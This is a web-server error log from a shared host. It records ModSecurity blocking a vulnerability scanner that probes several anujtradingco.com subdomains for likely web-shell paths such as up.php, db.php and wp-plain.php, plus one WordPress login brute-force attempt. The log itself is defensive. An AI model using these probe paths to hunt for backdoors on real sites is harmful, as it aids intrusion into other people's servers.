[Tue May 26 18:05:29.307984 2026] [security2:error] [pid 960743:tid 960920] [client 45.154.98.198:56586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4jwAAALQ"]
[Tue May 26 18:05:29.309211 2026] [security2:error] [pid 960743:tid 960878] [client 45.154.98.198:56517] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4kAAAAIo"], referer: www.google.com
[Tue May 26 18:05:29.318954 2026] [security2:error] [pid 960743:tid 960953] [client 45.154.98.198:56656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4jQAAANU"], referer: www.google.com
[Tue May 26 18:05:29.394520 2026] [security2:error] [pid 960743:tid 960993] [client 45.154.98.198:64713] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.service.google.com.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4kwAAAP0"], referer: www.google.com
[Tue May 26 18:05:29.395904 2026] [security2:error] [pid 960743:tid 960961] [client 45.154.98.198:64711] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.test.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4lgAAAN0"], referer: www.google.com
[Tue May 26 18:05:29.399011 2026] [security2:error] [pid 960743:tid 960946] [client 45.154.98.198:64717] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.greenfood.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4mAAAAM4"]
[Tue May 26 18:05:29.401598 2026] [security2:error] [pid 960743:tid 960998] [client 45.154.98.198:64703] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.greenfood.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4nQAAAQI"], referer: www.google.com
[Tue May 26 18:05:29.403369 2026] [core:error] [pid 960743:tid 960980] [client 45.154.98.198:64704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.403383 2026] [core:error] [pid 960743:tid 960980] [client 45.154.98.198:64704] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.411014 2026] [autoindex:error] [pid 960743:tid 960963] [client 45.154.98.198:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/greenfood/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:05:29.413533 2026] [autoindex:error] [pid 960743:tid 960976] [client 45.154.98.198:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:05:29.416314 2026] [security2:error] [pid 960743:tid 960900] [client 45.154.98.198:62239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.test.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4oAAAAKA"]
[Tue May 26 18:05:29.418254 2026] [core:error] [pid 960743:tid 960901] [client 45.154.98.198:62241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.418268 2026] [core:error] [pid 960743:tid 960901] [client 45.154.98.198:62241] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.418913 2026] [security2:error] [pid 960743:tid 960972] [client 45.154.98.198:62238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.greenfood.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4oQAAAOg"], referer: www.google.com
[Tue May 26 18:05:29.475419 2026] [security2:error] [pid 960743:tid 960951] [client 45.154.98.198:62249] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.service.google.com.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4rQAAANM"], referer: www.google.com
[Tue May 26 18:05:29.478284 2026] [security2:error] [pid 960743:tid 960988] [client 45.154.98.198:62245] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.service.google.com.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4rwAAAPg"]
[Tue May 26 18:05:29.484455 2026] [autoindex:error] [pid 960743:tid 960956] [client 45.154.98.198:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:05:29.485142 2026] [security2:error] [pid 960743:tid 960932] [client 185.192.70.72:63021] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.70.192.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autodiscover.gcirsm.org.in"] [uri "/templates/beez3/index.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4sQAAAMA"]
[Tue May 26 18:05:29.490037 2026] [security2:error] [pid 960743:tid 960979] [client 45.154.98.198:62266] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4sgAAAO8"]
[Tue May 26 18:05:29.495303 2026] [security2:error] [pid 960743:tid 960985] [client 45.154.98.198:62257] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4tQAAAPU"], referer: www.google.com
[Tue May 26 18:05:29.497368 2026] [autoindex:error] [pid 960743:tid 960912] [client 45.154.98.198:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/service.google.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:05:29.509321 2026] [security2:error] [pid 960743:tid 960973] [client 45.154.98.198:62287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.new.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4vgAAAOk"], referer: www.google.com
[Tue May 26 18:05:29.509821 2026] [security2:error] [pid 960743:tid 960955] [client 45.154.98.198:56585] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/kwwdzost.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4vwAAANc"], referer: www.google.com
[Tue May 26 18:05:29.510369 2026] [security2:error] [pid 960743:tid 960889] [client 45.154.98.198:62289] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.new.anujtradingco.com"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4wAAAAJU"]
[Tue May 26 18:05:29.510432 2026] [security2:error] [pid 960743:tid 960955] [client 45.154.98.198:62242] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.test.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4wQAAANc"], referer: www.google.com
[Tue May 26 18:05:29.511771 2026] [core:error] [pid 960743:tid 960960] [client 45.154.98.198:62290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.511787 2026] [core:error] [pid 960743:tid 960960] [client 45.154.98.198:62290] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.514042 2026] [security2:error] [pid 960743:tid 960962] [client 45.154.98.198:62288] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.new.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4wgAAAN4"], referer: www.google.com
[Tue May 26 18:05:29.515328 2026] [security2:error] [pid 960743:tid 960967] [client 45.154.98.198:62260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4wwAAAOM"], referer: www.google.com
[Tue May 26 18:05:29.516392 2026] [autoindex:error] [pid 960743:tid 960931] [client 45.154.98.198:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/new/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:05:29.580324 2026] [security2:error] [pid 960743:tid 960778] [remote 111.229.141.137:46432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4lQAAjiI"]
[Tue May 26 18:05:29.713499 2026] [core:error] [pid 960743:tid 960936] [client 45.154.98.198:64663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.713532 2026] [core:error] [pid 960743:tid 960936] [client 45.154.98.198:64663] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.763583 2026] [security2:error] [pid 960743:tid 960909] [client 45.154.98.198:64712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.test.anujtradingco.com"] [uri "/mvxforvr.php"] [unique_id "ahWTkfQvEln_BHBy2zJ41gAAAKk"], referer: www.google.com
[Tue May 26 18:05:29.812741 2026] [security2:error] [pid 960743:tid 960993] [client 45.154.98.198:64705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.greenfood.anujtradingco.com"] [uri "/luqeibvd.php"] [unique_id "ahWTkfQvEln_BHBy2zJ43AAAAP0"], referer: www.google.com
[Tue May 26 18:05:29.814467 2026] [core:error] [pid 960743:tid 960996] [client 45.154.98.198:52345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.814480 2026] [core:error] [pid 960743:tid 960996] [client 45.154.98.198:52345] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.859891 2026] [core:error] [pid 960743:tid 960897] [client 45.154.98.198:52344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.859912 2026] [core:error] [pid 960743:tid 960897] [client 45.154.98.198:52344] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.860705 2026] [security2:error] [pid 960743:tid 960978] [client 45.154.98.198:60848] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ44AAAAO4"], referer: www.google.com
[Tue May 26 18:05:29.877519 2026] [security2:error] [pid 960743:tid 960898] [client 45.154.98.198:62253] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/wvurmzua.php"] [unique_id "ahWTkfQvEln_BHBy2zJ44QAAAJ4"], referer: www.google.com
[Tue May 26 18:05:29.884346 2026] [security2:error] [pid 960743:tid 960970] [client 45.154.98.198:57649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.service.google.com.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ44gAAAOY"], referer: www.google.com
[Tue May 26 18:05:29.884522 2026] [security2:error] [pid 960743:tid 960992] [client 45.154.98.198:57648] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.test.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ44wAAAPw"], referer: www.google.com
[Tue May 26 18:05:29.885722 2026] [security2:error] [pid 960743:tid 960920] [client 45.154.98.198:57644] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.greenfood.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkfQvEln_BHBy2zJ45AAAALQ"], referer: www.google.com
[Tue May 26 18:05:29.909798 2026] [security2:error] [pid 960743:tid 960896] [client 45.154.98.198:62248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.service.google.com.anujtradingco.com"] [uri "/rqkmmlvh.php"] [unique_id "ahWTkfQvEln_BHBy2zJ45QAAAJw"], referer: www.google.com
[Tue May 26 18:05:29.910775 2026] [security2:error] [pid 960743:tid 960923] [client 45.154.98.198:62280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.new.anujtradingco.com"] [uri "/yjvfwmbh.php"] [unique_id "ahWTkfQvEln_BHBy2zJ45gAAALc"], referer: www.google.com
[Tue May 26 18:05:29.948600 2026] [core:error] [pid 960743:tid 960881] [client 45.154.98.198:60809] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:29.948618 2026] [core:error] [pid 960743:tid 960881] [client 45.154.98.198:60809] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: www.google.com
[Tue May 26 18:05:30.014854 2026] [security2:error] [pid 960743:tid 960980] [client 45.154.98.198:51090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkvQvEln_BHBy2zJ46AAAAPA"], referer: www.google.com
[Tue May 26 18:05:30.024729 2026] [security2:error] [pid 960743:tid 960930] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWTkfQvEln_BHBy2zJ4ygAAAL4"]
[Tue May 26 18:05:30.039502 2026] [security2:error] [pid 960743:tid 960991] [client 45.154.98.198:60663] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.new.anujtradingco.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahWTkvQvEln_BHBy2zJ46QAAAPs"], referer: www.google.com
[Tue May 26 18:05:30.059882 2026] [security2:error] [pid 960743:tid 960963] [client 45.154.98.198:55187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkvQvEln_BHBy2zJ46gAAAN8"], referer: www.google.com
[Tue May 26 18:05:30.295764 2026] [security2:error] [pid 960743:tid 960873] [client 45.154.98.198:61400] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.test.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkvQvEln_BHBy2zJ49QAAAIU"], referer: www.google.com
[Tue May 26 18:05:30.433575 2026] [security2:error] [pid 960743:tid 960905] [client 45.154.98.198:56871] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.greenfood.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkvQvEln_BHBy2zJ49wAAAKU"], referer: www.google.com
[Tue May 26 18:05:30.463966 2026] [security2:error] [pid 960743:tid 960899] [client 45.154.98.198:50427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.anujoverseas.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkvQvEln_BHBy2zJ4-AAAAJ8"], referer: www.google.com
[Tue May 26 18:05:30.475716 2026] [security2:error] [pid 960743:tid 960964] [client 45.154.98.198:65308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.service.google.com.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkvQvEln_BHBy2zJ4-QAAAOA"], referer: www.google.com
[Tue May 26 18:05:30.479569 2026] [security2:error] [pid 960743:tid 960906] [client 45.154.98.198:51071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.new.anujtradingco.com"] [uri "/wp-plain.php"] [unique_id "ahWTkvQvEln_BHBy2zJ4-gAAAKY"], referer: www.google.com
[Tue May 26 18:05:30.833574 2026] [security2:error] [pid 960743:tid 960894] [client 45.154.98.198:58230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "service.google.com.anujtradingco.com"] [uri "/ikgwbalk.php"] [unique_id "ahWTkvQvEln_BHBy2zJ5AwAAAJo"], referer: www.google.com
[Tue May 26 18:05:30.897354 2026] [security2:error] [pid 960743:tid 960947] [client 45.154.98.198:56550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.test.anujtradingco.com"] [uri "/fbqtcijy.php"] [unique_id "ahWTkvQvEln_BHBy2zJ5BAAAAM8"], referer: www.google.com
[Tue May 26 18:05:31.114672 2026] [security2:error] [pid 960743:tid 960993] [client 45.154.98.198:54785] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.greenfood.anujtradingco.com"] [uri "/xhcszdoj.php"] [unique_id "ahWTk_QvEln_BHBy2zJ5DAAAAP0"], referer: www.google.com
[Tue May 26 18:05:31.173474 2026] [security2:error] [pid 960743:tid 960978] [client 45.154.98.198:57329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.service.google.com.anujtradingco.com"] [uri "/djltwwbk.php"] [unique_id "ahWTk_QvEln_BHBy2zJ5EQAAAO4"], referer: www.google.com
